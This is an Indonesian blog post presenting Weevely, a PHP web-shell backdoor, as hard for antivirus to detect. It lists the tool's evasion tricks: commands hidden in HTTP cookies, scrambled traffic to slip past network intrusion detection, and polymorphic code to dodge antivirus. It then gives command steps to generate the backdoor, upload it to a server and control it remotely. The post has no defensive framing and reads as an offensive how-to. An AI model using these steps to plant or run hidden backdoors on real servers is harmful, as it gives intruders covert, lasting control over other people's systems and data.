Weevely Backdoor 19 Februari 2013 oleh Admin

Weevely adalah PHP Shell atau web backdoor yang saat ini masih sulit dideteksi oleh anti virus web yang menyediakan interface seperti konsol telnet. Ini adalah alat penting untuk eksploitasi web aplikasi, dan dapat digunakan sebagai backdoor tak terdeteksi atau sebagai shell web untuk mengelola account web premium, bahkan hosting gratis.

Saat ini weevely sudah terdapat dalam distro backtrack linux, alasan backdoor ini sulit dideteksi oleh orang awam dalam bidang security :
- Backdoor menerima perintah tersembunyi dengan HTTP Cookie.
- Komunikasi (client – backdoor) di acak untuk meloloskan NIDS signature detection.
- Backdoor jenis polymorphic PHP Code untuk meloloskan AV detection.

Penggunaan :
- Memasuki direktori

root@bt:~# cd /pentest/backdoors/web/weevely
- Generate backdoor
root@bt:~# ./weevely password path
Selanjutnya file backdoor itu di upload ke suatu server. Dengan demikian backdoor sudah tertanam di server.

- Mengakses backdoor
root@bt:~# ./weevely url+path password